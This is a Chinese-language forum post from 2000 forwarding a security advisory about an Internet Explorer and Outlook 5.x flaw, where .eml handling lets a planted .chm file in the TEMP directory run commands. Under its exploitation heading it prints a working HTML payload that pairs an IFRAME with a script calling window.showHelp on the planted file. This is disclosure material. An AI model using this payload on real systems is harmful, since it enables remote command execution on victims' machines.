发信人: kevinlee()
整理人: (2000-03-22 19:20:38), 站内信件
|
受影响的系统:IE and Outlook 5.x
不受影响的版本: 未知
远程: YES / 本地:YES
内容摘要:
IE 同 outlook 5.x 在处理.eml文件是允许攻击者在执行任何命令.
被攻击者只有在打开浏览器或outlook时受到攻击。
这个问题的原因在于outlook 和 ie 在TMPE目录创造任何名字的临时文件.
这样就允许攻击者在 TEMP 目录放置一个 .chm文件,其文件包含着 "shortcut" 命令.
漏洞的利用:
<IFRAME align=baseline alt="" border=0 hspace=0 src="cid:000701bf8458$ eb570380$dc0732d4@bbb"></IFRAME>
<SCRIPT>
setTimeout('window.showHelp("c:/windows/temp/abcde.chm");',1000);
setTimeout('window.showHelp("c:/temp/abcde.chm");',1000);
</SCRIPT>
例子:
http://www.nat.bg/~joro/eml.html
解决方案:
暂无
-- -------
Sincerly
KevinLee
http://mudfrog.126.com (网络安全站点)
irc: shell.cicnet.cc:6667 #mudfrog (网络安全频道)
irc: irc.szonline.net:6667 #internet (网络安全频道)
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.96.190.124]
|
|